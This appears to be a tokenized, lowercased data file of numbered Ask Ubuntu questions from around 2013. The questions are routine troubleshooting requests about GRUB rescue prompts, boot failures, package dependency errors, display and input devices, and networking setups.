03:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ]
385954	i can not boot ubuntu 12.04	i have installed windows xp after installed ubuntu 12.04 . now i am unable to boot ubuntu . i have used boot-repair , but no use . i got the following http : //paste.ubuntu.com/6509719/ .
385955	clean install cinnamon	i installed cinnamon a while ago and did n't like it so i removed it ( followed some post online to remove it completely as apt-get autoremove cinnamon was n't very successful ) . after removing it , i was still left with gnome and gnome 2d today i reinstalled it ( apt-get install cinnamon ) and i logged in using cinnamon and as son as i so much as pressed a key or clicked an icon , it crashed . i had to shut down using a virtual console . how can i fix this ? i would prefer removing cinnamon + gnome + gnome 2d completely and installing cinnamon again .
385958	modifying 3rd level keys in ubuntu 12.04 lts	i know how to switch to 3rd level keys using 'system settings ' > 'keyboard layout ' > 'options ' > 'key to choose 3rd level ' . however after choosing 3rd level for example using caps lock , i want to modify i , j , k and l to arrow keys . how i can do it ? or what kind of tools i should to use in order to change ? thank you in advance .
385959	getting a ubuntu installation disk	ok i 'll make it simple . i live in sri lanka . and i dont have a good internet connection . so i already have ubuntu 10.10 which i got from shipit.ubuntu.com some time back . and distributed some copies of it to my friends so they have started to use linux like me . but the problem is i ca n't download the latest version of ubuntu lts edition because of the weak internet connection i have . and also it 's not available in shops in sri lanka ( they also have the old version ordered from shipit ) so is there anyway i can get a ubuntu lts cd shipped to my place so i can distribute copies of it to my friends . i really want one to give to people i know . so is there anyway i can get a ubuntu disk shipped to my address ?
385961	error in ubuntu 12.04 with root.cern.ch : `` undefined reference to : ''	i get following errors while i do compiling of data analysis softwares made in my institute . it works on other linux like opensuis and not on my ubuntu 12.04 . a bit of google search shown that the new ubuntu has problem with linking stuffs and downgrading the c++ version might be workaround . a link on similar problem : https : //www.mppmu.mpg.de/bat/ ? page=faq gcc -ldl -g -o fba fba.o libfbanal.so \ -l/usr/local/root/lib -l/usr/local/root/lib -lcore -lcint -lrio -lnet -lhist -lgraf -lgraf3d -lgpad -ltree -lrint -lpostscript -lmatrix -lphysics -lmathcore -lthread -pthread -lm -ldl -rdynamic -l/usr/local/root/lib -lgui -lcore -lcint -lrio -lnet -lhist -lgraf -lgraf3d -lgpad -ltree -lrint -lpostscript -lmatrix -lphysics -lmathcore -lthread -pthread -lm -ldl -rdynamic -lrint -l./ -lfbrun -l/usr/lib64/ -lstdc++ .//libfbrun.so : undefined reference to `tgraph : :getxaxis ( ) const' .//libfbrun.so : undefined reference to `th1f : :th1f ( char const* , char const* , int , double , double ) ' .//libfbrun.so : undefined reference to `th2f : :th2f ( char const* , char const* , int , double , double , int , double , double ) ' .//libfbrun.so : undefined reference to `tgraph : :tgraph ( int , double const* , double const* ) ' .//libfbrun.so : undefined reference to `tgraph : :getyaxis ( ) const' collect2 : ld returned 1 exit status make : *** [ fba ] error 1
385962	warzone 2100 occasionally zoomes my screen largly , how to fix it ?	sometimes after playing warzone 2100 for long time , when i exit the game , the desktop screen just zooms largly , and only 1/4 th screen is visible.the top bar is visible completely , but is inoperable . i would have shared the screen shot , but the save or copy buttons are in the invisible 3/4 th part of the screen . there is an answer already present here.but it is not perfect solution , because it only allows me to restart the system , which causes certain important tasks ( like downloading files ) to end . i wish to know if there is another way to zoom out the screen , which will allow me to use my pc correctly ( and not just allow me to restart it ) .
385963	after installing ubuntu it says no operating system found	when installation is finished it says reboot your pc but when i reboot it says no operating system found . what to do ? i installed with usb . ubuntu version : 13.10 64 bit before ubuntu os : windows 8 pro 64 bit
385964	volume control vor hdmi audio output	i have an av receiver connected to my pc via hdmi . audio and video work fine , but i am not able to adjust the volume using the control in the taskbar . what is wrong ? currently i have to use the remote of my av receiver , but that is not the way it should work .
385965	ubuntu wo n't start and wo n't recognize log in	well i hope someone can help me . i am noob at linux and installed 13.10 version but it does n't recognize the graphic card ( nvidia geforce 610m ) , after following some steps to install the drivers in this forums the computer ask me to restart it . then it does n't start the screen goes black and the pointer goes 'x ' , so i read that it can be solved with crtl+alt+f1 and some codes but when it asks for my login i write my user and password and it says login incorrect . i know my login is julián díaz because i 'm from colombia and put the accent in the 'á ' and 'i ' ( i hope somebody understand ) and my computer is in english , may be there is the problem . if it is can be solve ? so i 'm stocked and i though the solution is install windows 7 and later again linux , what do yo say ? i wo n't care about the data ...
385967	session logsoff automatically when using xrdp	i have installed xrdp and setup a thin client as my remote system using the information from this askubuntu post . when i log in from the remote system , user gets logged in and i can do my work . but after a few minutes the session automatically gets closed . how do i solve this problem ?
385971	ubuntu not using avahi	i 'm working with a robot ( baxter ) that uses ros which in turn uses avahi to resolve names . i 'm having problems resolving the name on one of the ubuntu 's . i can resolve the name of the robot ( bender.local ; ) from different other computers , two ubuntus with the same avahi configuration as the problematic one and and a mac . if i do avahi-discover , i can see bender discovered under stfp file transfer , ssh remote terminal and workstation , but trying ping or ssh or http all fail with hostname unresolved . my guess is that resolving names in this particular machine is ignoring avahi , even though the avahi-daemon is running . how can i tell ubuntu to use avahi to resolve names , too ?
385973	what is the purpose of compiz ( if any ) , inside ubuntu 12.04 , if i use gnome-classic ( gnome-session-fallback ) ?	this question would serve me to figure out if i can remove , or replace compiz , if i do n't use unity . i seem to be running into a lot of desktop/window bugs , such as windows unminimizing on the wrong workspace , windows not activating when unmaximized ( nasty one ) , and now , white taskbar buttons . i would appreciate a comprehensive answer that makes me understand what is the place of compiz among software products like gnome , `` unity '' , lightdm , metacity , which are , for me , stuff that overlap in functionality in a blurry way . i have a friend who said he removed compiz from his 12.04 installation , as if not needed . that sounds dubious to me , since i use something called ccsm ( compizconfig settings manager ) to tweak various desktop stuff all the time . i also hear ( read on launchpad ) that `` compiz is dead '' ( or will soon be ) . if you look at development , pretty severe bugs are progressing very slowly . i would like to know what to turn to , in the future . i should add , i very much tend to stick to gnome-classic , because the unity thing always seemed a step backward ( or sideways ) to me : big buttons intended to be `` tapped '' on a tablet rather than clicked , a launcher that never did what alt+f2 did in previous versions ( 2 simple things : autocomplete and suggestions ) . did n't mean to wander , question in the title , thank you .
385976	how to store data on a `` secure '' place so that nobody can access to it	i am building a `` kiosk-computer '' -terminal for my client . at the moment the `` kiosk-mode '' is accessing into ubuntu with the guest-user , this is enough for my costumer at the moment . ( btw . if somebody know a good opensource kiosk lockdown software , please tell me. ) but one questions is unclear , what if somebody take the harddisk out , or , take the whole computer and then accessing with another computer to the harddisk , the answer is , the thief will have access to the data . i would preffeer to enrypct the data but there are some limitations . when i encrypt the whole harddisk , every startup of the computer need the harddisk passphrase . is there a way to encrypt my whole disk without entering on every boot the passphrase ? or can i encrypt selected files , the maingoal is that these files which i would encrypt are config-files for sensitive software which should run on the guest user ... hope you understand me.. best regards
385981	`` serious errors were found while checking the disk drive for / . '' error while booting after upgrade from 12.04 lts	i installed ubuntu 12.04 64bit on my laptop . after manually upgrading the laptop wo n't boot any more and i get the this error message : '' serious errors were found while checking the disk drive for /. '' . i already tried to use the fix mentioned here : i get a `` serious errors while checking the disk drives for /boot '' error while booting but it wo n't work because my ubuntu is installed on ntfs and fsck does not work on ntfs ... when i press shift on startup i can boot into older ubuntu versions but they do n't work properly either . what can i do now ? is there any way to recover my 12.04 lts ?
385985	unable to create live usb pen	i know there are tons of post about this already and i have read most of them . but still they do n't answer my question . as said above i am trying to create a bootable usb pen with ubuntu 12 on it i have use the linux usb creator got a error that it 's unable to boot the kernel i used lili got a error that it 's unable to boot the kernel i renanemd some files on the stick got a error that it 's unable to boot the kernel and i know the stick ( intenso 32 gb ) is up to the job there was a backtrack version on it before but even with that i had loads of troubel there was one post that solved my problem but i ca n't find that post anymore it was about creating a active partition on the usb pen so the computer would see it as a hard drive en then installing linux on it like i would install it on a hd . i ca n't even find a live cd version that i download and can run of cd ( ' do n't have a checksum program anymore on my windows ) i am running windows 8 looking forward to your replies kind regards nigel
385986	application integration with unity launcher	i like to integrate a application ( a digital shredder , a interface for shred command ) to allow drag-and-drop files from nautilus to launcher icon and then open the program and fill the file path field . this is possible ? i guess i need some code . the program is written in python .
385987	ubuntu 13.04 icons look weird , please help	this is my ubuntu 's icons on ambiance theme . most system icons are gone , the folder icon look like unknown file type icon . but when i tried to switch to radiance theme , icons look ok . these are some screenshots that someone who has tried to help has asked me . please advice me what should i do ? ? ? thanks .
385988	routes not added after running `pon` to start pptp client	i have setup my dev server with the pptp client and use pon { vpn name } to start the client . i also added the following file in /etc/ppp/ip-up.d/ { vpn name } to setup some routes for me : # /bin/sh if [ `` $ { ppp_ipparam } '' = `` { vpn name } '' ] ; then /sbin/route add -net 10.2.17.0/24 dev $ { ppp_iface } fi after running sudo pon { vpn name } dump debug nodetach i do n't see any errors in the output , but the routes not added to my routing table . i 've also tried changing the file just to this : # /bin/sh /sbin/route add -net 10.2.17.0/24 dev ppp0 and still nothing . i have ensured that the file is owned by root and has executable permissions ( 755 ) .
385990	can i remap right alt to compose in 13.10 and keep left alt for hud ?	trying to follow these instructions : using alt + keycode for accents ? to make typing accents easier ( and consistent between osx at work and ubuntu at home ) and i ca n't for the life of me figure out how to set a compose key . in my keyboard shortcuts i see that `` compose key '' is disabled but no amount of right clicking or double clicking will let me enable it . for keys that are n't disabled , just selecting the entry gives me a `` new accelerator ... '' option . but not for compose . i tried to follow the instructions on how to set compose key to pause in 13.10 ? but my right alt key still pulls up the hud . ps . i do wish that what are unity 's keyboard and mouse shortcuts ? were updated for 13.10
385992	area drawing - huion tablet	i 've tried everything here on ask ubuntu and found good solutions for tablets drawing of huion brand . however i have a problem that i believe has not been resolved : i have the h420 huion tablet and put it in ubuntu 12:04 lts it works normal but the area is drawing on the screen is equivalent to a portion of it , say . ( starting from the left top edge ) , and the same occurs with useful drawing area on the tablet itself . in my case , my monitor is 1368x768 and it seems that the drawing area is only 346 pixels wide by 192 pixels high ( values ââonly for you to understand better what happens ) i installed the drivers wizardpen , calibrated and managed to resolve the drawing area on the monitor , but the tablet functional area remains small ( the area of the drawing tablet is too small , the pen works up to a point and discards the rest of the area ) i would like to help .
385994	cloudstack networking issue	i 'm experiencing problems in cloudstack 4.2 installation on both ubuntu server 12.04 and 13.10 . installed cloudstack management controller and a kvm host in two separate boxes cloudstack installations went fine created a basic networking zone , all is green , storage ok , vvms ok at this point , i 'm able to ping physical hosts , storage and proxy ssvm public ip address . created instance with basic template of centos , fine automatically created system router at this point i 'm still able to ping physical hosts , but no longer storage ssmv , proxy ssvm and the centos instance created a while ago . no errors , all is green , all processes running fine , just connectivity issue on the public network side of proxy/storage vvms and instances . important i 've configured cloudstack in centos enviroment before testing ubuntu server , with both basic and advanced networking ( vlan separation ) without problems . security group is already configured with icmp/ssh rules for inbound . any ideas ? thanks
385995	how to solve grub rescue	in my system there was windows 7-32 bit and linux tamil ( govt laptop ) i deleted the linux partition from windows by disk management in windows . when i rebooted the system i get the follwing thing , grub loading . welcome to grub ! error : unknown filesystem . entering rescue mode ... grub rescue > pls help me to solve this issue and access me to windows
385998	re mag 250 iptv box	have just purchased a mag250 iptv box and they recommend using ubuntu . i only have a windows 8.1 operationg system and have never used linux . does anyone know of how to install stalkler portal through ubuntu .
386002	last and lastlog do n't record login to x	i was interested in user login history so i looked into last and lastlog on my 13.10 ans 12.04 systems . on neither system did last nor lastlog record logins to x ( 13.10 using lightdm , 12.04 using gdm ) . it seems these tools record virtual terminal , terminal window and remote ssh logins only . the manpages for these tools led me to believe all sessions would be recorded . are these tools functioning properly ?
386004	recently installed ubuntu 13.10 - bad graphic	i recently chose to try out ubuntu 13.10 64-bit on my laptop and the graphics seems to be slightly worse than it used to be on windows 7 . i have a intel graphic card by the way , and i 've read that intel is supposed to be almost fully supported on linux . also i have seen other linux desktops for instance , and the icons seems to be sharper and better looking compared to mine . it might be an easy answer to my problem , i downloaded a driver from hp 's home page , but i can not figure out how to install it . everything on my computer looks blurry , except if i watch a movie in vlc . does anyone have an answer to my problem ? i am a thankful newbie for every answer i can get : ) edit : xrandr -q gives this output : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 16384 x 16384 lvds connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 310mm x 174mm 1366x768 60.0*+ 40.0 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 displayport-0 disconnected ( normal left inverted right x axis y axis ) displayport-1 disconnected ( normal left inverted right x axis y axis ) displayport-2 disconnected ( normal left inverted right x axis y axis ) vga-0 disconnected ( normal left inverted right x axis y axis )
386006	can we create partition with data in it	i want to create a new partition in my hd , but already i am having some data 's on my disk . so how to create a new partition without affecting my data
386010	how can i decide whether i care about a kernel vulnerability related to ipv6 ?	i 've got some ubuntu 10.04 and 12.04 systems that have an inet6 ( ipv6 ) address . however , our firewall is configured to deny all and some pass rules are added for inet ( ipv4 ) addresses . do i need to care about updating our kernels when a change is made to them to address ipv6 vulnerabilities ?
386011	silverlight alternative for ubuntu	i 'm new on ubuntu and noticed there 's no silverlight plugin for firefox . there are some alternatives i 've tried , like moonlight and pipelight , they both do n't seem to work on my school 's website . i also do n't want to use something like wine because i have some bad experiences with that.i am using ubuntu 13.10
386013	how do you solve the glib.h not found error when building webkit ?	i follow the instructions at : https : //help.ubuntu.com/community/webkit i get an error when running ./autogen.sh -- prefix=/usr stating that : conftest.c:28:18 : fatal error : glib.h : no such file or directory compilation terminated .
386021	fancontrol not starting	i ran pwmconfig just fine , and the fans are running much quieter ( before they were all full speed all the time ) , however i want to fine tune things a bit . so , i try to run fancontrol but i get this : $ fancontrol loading configuration from /etc/fancontrol ... common settings : interval=10 settings for hwmon0/device/pwm4 : depends on hwmon0/device/temp2_input controls hwmon0/device/fan4_input mintemp=35 maxtemp=55 minstart=92 minstop=32 minpwm=32 maxpwm=255 settings for hwmon0/device/pwm3 : depends on hwmon0/device/temp2_input controls hwmon0/device/fan3_input mintemp=35 maxtemp=55 minstart=94 minstop=34 minpwm=34 maxpwm=255 settings for hwmon0/device/pwm2 : depends on hwmon0/device/temp2_input controls hwmon0/device/fan2_input mintemp=32 maxtemp=55 minstart=150 minstop=0 minpwm=0 maxpwm=255 settings for hwmon0/device/pwm1 : depends on hwmon0/device/temp2_input controls hwmon0/device/fan1_input mintemp=37 maxtemp=55 minstart=154 minstop=34 minpwm=34 maxpwm=255 error : file hwmon0/device/pwm4 does n't exist error : file hwmon0/device/pwm3 does n't exist error : file hwmon0/device/pwm2 does n't exist error : file hwmon0/device/pwm1 does n't exist at least one referenced file is missing . either some required kernel modules have n't been loaded , or your configuration file is outdated . in the latter case , you should run pwmconfig again . i am not really sure where to go from here , i do n't know which kernels it may be talking about our how to obtain them . if it helps , here are my system specs : cpu : amd a10-6800k mobo : asus f2a85-m pro ssd : samsung 840 series 120gb memory 8gb g skill ripjaws 2400mhz os : ubuntu 13.10 i also tried running fancontrol in sudo and received this : file /var/run/fancontrol.pid exists , is fancontrol already running ? any tips are greatly appreciated .
386023	how to update to 3.12 kernel on ec2 ?	updating kernels on ec2 seems a nightmare . i 'm on saucy , currently on kernel 3.11.0-14-generic according to uname -a . there 's a fix in 3.12 that i need , how can i get it ? i tried the instructions here to get the below in my system log , and i had to edit the grub default to fix it : kernel /boot/vmlinuz-3.12.0-031200-generic root=label=cloudimg-rootfs ro console=hvc0 initrd /boot/initrd.img-3.12.0-031200-generic can only boot x86 64 kernels , not xen-3.0-x86_32p error 13 : invalid or unsupported executable format press any key to continue ... how can i upgrade to 3.12 ?
386027	how to keep unity launcher hidden and locked but super key should launch the dash ?	i 'd like to keep the unity launcher hidden and locked to that state . but the super key should still be able to launch the dash . ( with the auto-hide launcher feature enabled , tapping super key for dash does n't seem to work when there 's no active windows i.e . when desktop is shown . is there any solution to that ? ) also , the launcher should not appear when i launch the dash or the panel run dialogue . i 'd like to know if there is there a hack to launch dash with mouse gesture .
386028	ubuntu 12.04 is stuck at startup after upgrading , now i wan na install a new copy of 13.10	i installed 12.04 as a fresh copy which made grub as my default bootloader and windows 7 loader became 6th option in this bootloader . now my query is , if i install a fresh copy of 13.10 in the same partition in which 12.04 is , after formatting that partition . will i be able to access windows 7 in the new bootloader as 5th or 6th option ?
386030	how to uninstall monaco font ?	i installed monaco font like it was described in this question but now i want to uninstall it . how can i do this ?
386038	ubuntu is installed , but computer just boots to windows 8.1	i properly ( i think ) installed ubuntu along side with windows 8.1 which is my computers first os . i have done the `` try ubuntu without installing '' option and then trying to install and it tells me that ubuntu is already installed . the problem is that i can not get ubuntu to boot . my computer jumps straight to windows 8.1 everytime . i have enable legacy booting , and tried everything i can think of . any suggestions ?
386039	how to insert linuxefi module during boot	i am running ubuntu 13.10 with kernel 3.11.0-14-generic . everything was working fine , but then i did a routine software update and the computer would then not boot . unfortunately , i 'm not sure what software was updated , but i get the feeling it modified my grub configuration ( more on why later ) . booting would freeze on `` loading initial ramdisk '' regardless of whether i tried regular or recovery mode for both 3.11.0-14 and 3.11.0-12 kernels . while poking around , i ran into a solution that allows me to boot : drop into a grub > command prompt by pressing c at the advanced boot options menu . insert the linuxefi module by typing insmod ( hd0 , gpt7 ) /usr/lib/grub/x86_64-efi/linuxefi.mod where hd0 , gpt7 is my linux partition . after that , i pressed ctrl-alt-delete which seemingly reboots ( hear the computer beep , and am offered grub options again ) . however , now when i select any of the boot options ( default or recovery mode ) , the computer boots fine . if , however , i do a real reboot , i get back to the same `` loading initial ramdisk '' freeze . so how can i make the insertion of the linuxefi module permanent ? i 'm assuming i should do this in one of the grub config files , but not sure which one . additional ideas on what caused this mess would be appreciated as well .
386040	monitor and record wireless data transfer in/out tracked by network/ssid	i 'm looking for a monitoring tool for my wireless data transfer . my problem is , all tools i found out there are either global ( independent of interface ) or queryable by interface . but my requirement is a bit different . i am exclusively using wireless but i use different networks from different providers . i can identify them all by their ssid 's and i would like to know how much data transfer i 've had from each of them separately . the data retention should be either configurable or at least 6+ months and charteable daily . i need this because i 'm on multiple wireless data providers in different locations and i would like to be aware when i need to switch to another provider in order to avoid excess transfer charges . i also do n't trust the operator transfer reports , so i 'd like to double check their measures .
386043	how to run windows on ubuntu without vt-x ? ?	i got intel atom processor , that has no vt-x , how can i run window 7/8 on my computer without vt-x ( guest os , maybe ... ) ? please give me a guide on this , i 'm really new to virtual machines . and thanks
386044	ubuntu 13.10 installer/live fails to boot from usb with exfat partition	i ca n't boot ubuntu live/installer from usb stick with exfat partition , anyone know how add support for exfat in a live cd/usb ?
386046	upgraded to 13.04 now getting jredetection `` your security settings have blocked an untrusted application from running	i upgraded ubuntu 12.10 to 13.04 upgraded java to 1.8.0-ea-b118 and still can not run my application to connect to my office . i have checked all the options and spent all day looking for hits on this issue but can not fins a solution . thanks . sorry meant to add that this is a url running in chrome that starts a java program . thanks .
386054	per-monitor font hinting	i have two displays out of which one is rotated to be vertical . is there a way to set font hinting to be vrgb on vertical display and rgb for horizontal display ?
386055	bluetooth ceased functioning	i have been using a number of devices ( phone , headset , speakers ) connected to my thinkpad which is running 13.04 . today quite out of the blue ( forgive the pun ! ) bluetooth disabled itself . despite going into settings and clicking on it refuses to activate bluetooth . i see an instantaneous list of the devices , then they disappear and bluetooth defaults to off . anybody any thoughts as to how i can restore bluetooth ?
386056	monaco is pixelated in web pages	i installed monaco font and it looks great in terminal : but it looks ugly in the browsers : how can i fix such a behavior ? i would like to see the correct font in web pages too .
386061	trying to uninstall vmware packages but get 'unmet dependencies ' error	so when i do dpkg -- get-selections | grep vmware i get ... vmware-tools-core install vmware-tools-esx-nox install vmware-tools-foundation install vmware-tools-guestlib purge vmware-tools-libraries-nox install vmware-tools-plugins-autoupgrade install vmware-tools-plugins-deploypkg install vmware-tools-plugins-guestinfo install vmware-tools-plugins-hgfsserver install vmware-tools-plugins-powerops install vmware-tools-plugins-timesync install vmware-tools-plugins-vix install vmware-tools-plugins-vmbackup install vmware-tools-services install i would like to remove these . so for instance when i do ... sudo apt-get -f remove vmware-tools-core i get ... reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-image-virtual : depends : linux-image-3.2.0-57-virtual but it is not going to be installed linux-server : depends : linux-headers-server ( = 3.2.0.56.66 ) but 3.2.0.57.68 is to be installed vmware-tools-esx-nox : depends : vmware-tools-core ( > = 9.0.5 ) but it is not going to be installed vmware-tools-plugins-autoupgrade : depends : vmware-tools-core-9.0.5 vmware-tools-plugins-deploypkg : depends : vmware-tools-core-9.0.5 vmware-tools-plugins-guestinfo : depends : vmware-tools-core-9.0.5 vmware-tools-plugins-hgfsserver : depends : vmware-tools-core-9.0.5 vmware-tools-plugins-powerops : depends : vmware-tools-core-9.0.5 vmware-tools-plugins-timesync : depends : vmware-tools-core-9.0.5 vmware-tools-plugins-vix : depends : vmware-tools-core-9.0.5 vmware-tools-plugins-vmbackup : depends : vmware-tools-core-9.0.5 vmware-tools-services : depends : vmware-tools-core-9.0.5 e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . if i run apt-get -f install i get ... after this operation , 36.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 464964 files and directories currently installed . ) unpacking linux-image-3.2.0-57-virtual ( from ... /linux-image-3.2.0-57-virtual_3.2.0-57.87_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-57-virtual_3.2.0-57.87_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/abi-3.2.0-57-virtual ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-57-virtual /boot/vmlinuz-3.2.0-57-virtual run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-57-virtual /boot/vmlinuz-3.2.0-57-virtual errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-57-virtual_3.2.0-57.87_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) johnmlocklear @ vweb-dev : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree here is the output of dpkg -l 'linux* ' http : //pastie.org/8528966 my goal is to remove the vmware tools packages . any help appreciated ...
386063	if i reinstall mysql do i lose my databases ?	i have mysql installed on my localhost . what happens if i have a problem with mysql and i want to re-install it again ? do i lose my existing databases ?
386068	tool to fetch and embed movie poster in file	i have a collection of movies in a directory on my computer . i am looking for a tool that can process this directory , look the movies up online ( i.e . on imdb ) , fetch the movie poster/dvd cover , and then embed it in the movie file ( so it shows up as the thumbnail in nautilus ) . i tried using the imdb-tools package , but it is currently broken due to changes in imdb 's website . it is also worth noting that the files are named $ title. $ ext ( i.e . movietitle.avi ) . as a result , the tool would probably need to support manually selecting the correct movie from a list . i am currently using xbmc , which can fetch and display the movie poster within the application , but it does not appear to actually store the artwork in the file . does anyone know of an application that can do this ?
386070	problems with permissions in apache ubuntu 13.10	i have had some problems with setting up my localhost . i have been following this guide -- > how-do-i-set-up-a-local-domain-name-in-apache-and-ubuntu but now i 'm stuck my localhost only returns a 403 error so there is some problems with my permissions but i have no idea of what it should be.. any help would be greatly appreciated . regards peter
386073	how can i reset the 'play/pause ' hotkey to 'audio pause ' without having a media keyboard ?	i 'm currently on a laptop running ubuntu 12.04 . is there a way to reset the values in system settings/keyboard/shortcuts sound and media back to the original values ( e.g . `` audio pause '' ) without having a media keyboard ? is there any key combination for this ?
386075	my mouse no longer works since 13.10 update	i have no experience with programming.since the last update my mouse has stopped working.i have checked the mouse on another computer and it works fine.any help would be appreciated.mouse is a leed 's mini wired mouse.thanks
386076	is there a way to stop lag ?	iâm playing games and there is always lag , i was wonder if there is a way to remove and possibly prevent lag without downloading anything or using the terminal ? i tried looking but there is only stuff on removing lag on windows : (
386077	asus k53e does not recognizes usb devices	in my asus k53e was installed win7 . usb ports from right side of notebook did not worked . i decided to install ubuntu 12.04 . in ubuntu it does not works too . it works , when i charging my mobile phone by usb . but when i plug pendrive , external hdd , mouse , it does not works . left side usb port is working well . card reader is working too . but right side it is 2 usb slots and the are not working . warranty said , that it is program ( os , drivers ) issue . how to solve this ?
386085	i cant install sdl because it has unmet dependencies	my input is : sudo apt-get install libsdl1.2-dev libsdl-image1.2-dev libsdl-mixer1.2-dev libsdl-ttf2.0-dev and the output is : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . libsdl-image1.2-dev : depends : libjpeg-dev depends : libtiff4-dev but it is not going to be installed libsdl1.2-dev : depends : libglu1-mesa-dev but it is not going to be installed depends : libpulse-dev but it is not going to be installed depends : libxt-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . how do i fix this ?
386087	what is being done to support 32bit apps on 13.10 64bit ?	i see that we can no longer simply `` apt-get install ia32-libs '' to gain 32bit application support under 13.10 . i 'm working with a restricted environment where we can only install 13.10 64bit , but still have some very important 32bit apps that must run . is work being done on getting proper 32bit support back into the ubuntu 64bit desktop releases ? our user is very upset because they spent a lot of resources vetting 13.10 for their new infrastructure and they do n't understand why windows and os x simply handle 32bit apps completely transparently while we 've hit a rather large stumbling block on ubuntu linux - supposedly the easiest and most compatible linux distro to use . is there a new magic bullet to get proper 32bit support into 13.10 ?
386088	link tv and pc through s-video	i installed ubuntu 13.10 and i have problem with tv connection . graphic card is radeon x1300/x1550 series . when i plug in tv and type xrandr : screen 0 : minimum 320 x 200 , current 1440 x 900 , maximum 8192 x 8192 dvi-0 disconnected ( normal left inverted right x axis y axis ) s-video disconnected ( normal left inverted right x axis y axis ) dvi-1 connected primary 1440x900+0+0 ( normal left inverted right x axis y axis ) 410mm x 257mm 1440x900 59.9*+ 75.0 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 75.0 72.8 66.7 60.0 720x400 70.1 i tried this - https : //wiki.archlinux.org/index.php/ati , section tv-out . but when i type last command xrandr -- output s-video -- mode 800x600 - > at this point you should see a 800x600 version of your desktop on your tv . there is nothing on tv and monitor turns black . file xong.conf is empty , i tried to generate it ( sudo xorg -configure ) , but : ( ee ) fatal server error : ( ee ) server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . ( ee ) ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . ( ee ) could anyone please help me ? ( sorry for my english , i 'm not native speaker )
386089	ubuntu 12.04 - can not unmount usb	i 'm using ubuntu 12.04 running kernel 3.2.0-55-generic . i am using gnome as my desktop . i logged in as a non-root admin user ( with sudo privileges ) . able to mount an usb drive ( by simply plugging it in ) . but not able to unmount it . error is : '' unable to umount usb0 . umount : /media/usb0 is not in the fstab ( and you are not root ) question : if the system automatically sensed and mounted it , why cant it figure out how to unmount it ? why is it not updating fstab on its own ? what is missing ?
386091	how to install different desktop managers on different tty	how do i install different desktop managers like unity , kde , xfce etc in different ttys so that i could toggle them using ctrlalt+f n , where n is 4,5,6 etc . in this answer i got the hint of such possibility . but i could not found a good documentation of the same .
386092	can i install ubuntu on my phone	i want to install ubuntu touch os on my phone micromax canvas hd a116 . could you help me in porting this for me . also want to know that does it support dual sim or not ? please reply me asap ...
386095	windows external harddrive	i 'm new to ubuntu . not sure how everything work yet . i have an external hard drive that is entirely windows data . xp operating system . how do i connect it to ubuntu ?
386096	impossible to see files in trash via nautilus	i saw some posts here teaching how to lead with it problem but any of them helped me . my problem is i deleted the trash icon from my desktop , and after that , i noticed few days after that accessing the trash via nautilus in my ubuntu 12.04 does not show any file even it have files in it , where i can see through ~/.local/share/trash . so , how i can solve the problem of seeing my files at trasg through nautilus and restore the desktop icon of it ? thanks in advance .
386099	ubuntu indicators in mate or xfce	is there any chance to put ubuntu indicators in xfce or mate . i want classic desktop environment like we had in ubuntu before unity came , but whichever de i use it have ugly indicators
386100	mouse and keyboard do not work on the login screen	i just finished installing xubuntu 13.10 in uefi mode . so it 's a fresh install . however , i am not logged in . i am currently up and running with the usb flash drive i used to install it , since i ca n't use my keyboard and mouse at the login screen . they are connected via usb ports and wired . i did not have any problems at all using them during the installation process and never have problems using them clicking and navigating around in the uefi menu right after bootup . ( fwiw , this particular thread was not really a solution to the problem imho as i would like to stay with xubuntu and not use another distribution . )
386102	want to duplicate work environment	at work they are running virtual linux servers . i do some scripting for them .. basically i want to duplicate the work environment so that i can script against my network lab at the house . ive been using some flavor of unix for quite some time and have held a job where one of my responsibilities was first level .. kind of a mini admin roll but ive never done actual admin work . so my question is , will ubuntu server run inside oracle vm . i have plenty of ram and disk space.. 24gig of ram and a 500g hard drive .
386103	where to get the drivers for avermedia avertv digi volar x a815 ?	does anyone knows where can i find the avermedia volar dvbt model a815 drivers ? thanks in advance .
386107	reinstaling epson xp-305 's driver software catolog corruption	i tried to install the printer driver for epson xp-305 2 times , second time with a new version . software center message appeared saying that there was some couurption in the software catalogue . i follow some procedure find on forum and at the end software center crash . how i can repair the software center and install the driver for the printer/scanner etc .
386108	ca n't create a bootable ubuntu usb stick with ubuntu	the startup disk creator crashes ! i followed the instructions carefully and i 've tried many times ( about 5 times ) . it crashes at the same part every time . when it asks for the password and says that it 's installing the bootloader . i 'm trying to make a ubuntu 13.10 live usb .
386110	'grub rescue ' is the most irritating problem that makes me want to pull my hair out	i have rescued my old computer for use as a wee testing ground for linux os . i considered trying lubuntu 13.10 on it but i get this strange 'grub rescue ' prompt ( something like ' can not read or write outside hd0 ) when i try to boot . i have googled many times for this error and used various methods that is supposed to fix this problem but to no avail . i have tried editing grub.cfg and update-grub in live cd reinstalling lubuntu 13.10 from live cd trying boot-repair in live cd i do not know why this problem occurs and it has been bugging me for a while and i need help fixing this computer . here are my old computer specs : amd athlon processor , 855mhz , 512mb ram thank you very much , bluehattedengie
